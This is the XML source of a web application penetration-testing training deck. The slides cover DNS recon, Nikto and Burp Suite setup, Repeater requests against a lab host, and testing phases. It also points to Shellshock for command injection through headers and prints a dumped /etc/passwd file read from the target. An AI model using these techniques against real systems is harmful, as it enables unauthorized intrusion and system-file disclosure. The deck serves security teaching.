              <a:t>auth4.dns.cogentco.com	internet address = 80.245.32.74</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>auth1.dns.cogentco.com	has AAAA address 2001:550:1:a::d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>auth4.dns.cogentco.com	has AAAA address 2001:978:1:a::d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3632585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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969880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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="882157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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841733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443 doesn’t allow enough time to copy/paste the Head/host lines before returning a timeout error.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222342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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239467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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2296756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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1275976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Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –H for all help items</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149987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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2288185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 write file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-c count number of word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>occurances</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1584599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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776571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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32090016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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3818372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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158959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http://burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select CA Certificate, and then import the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cert.der</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file as trusted authority certificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29285413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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1034883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 the base/root web page request to the repeater tab for manual testing – CTRL+R CMD+R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Proxy-&gt;HTTP History select: http://dojo-basic	GET	/	200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switch to the repeater tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request should look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: dojo-basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xhtml+xml,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upgrade-Insecure-Requests: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove Accept* headers as they are needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2472107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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906291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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065619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Information Gathering stage: Passive and non-passive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> methods. Looking for email addresses, how names are used, phone numbers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> site maps, any useful information that could be leveraged during the pen test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Application Workflows: Mapping all web services, web pages, finger printing of technologies used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Automated and Manual Fuzzing: Use automated scanners to quickly find possible attack vectors. Manually fuzz parameters and validate automated scan results. Any forced directory/file browsing would happen here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Exploit: Prove that the vulnerability exits and could potentially be used. The vulnerability would then be recorded for the findings report that also links back to the OWASP top 10, NIST, or CVE list.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3108924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Don’t forget to test headers, it is common to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, user-agent or any other custom headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also test hidden fields on forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="837721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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17909530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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4117397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to test headers, it is common to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, user-agent or any other custom headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11677038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to test headers, it is common to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, user-agent or any other custom headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look up Shell Shock for a good way to get command injection through headers on unpatched systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312994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root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bin:x:2:2:bin:/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sys:x:3:3:sys:/dev:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/games:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> man:x:6:12:man:/var/cache/man:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lp:x:7:7:lp:/var/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mail:x:8:8:mail:/var/mail:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> news:x:9:9:news:/var/spool/news:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uucp:x:10:10:uucp:/var/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uucp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proxy:x:13:13:proxy:/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> www-data:x:33:33:www-data:/var/www:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
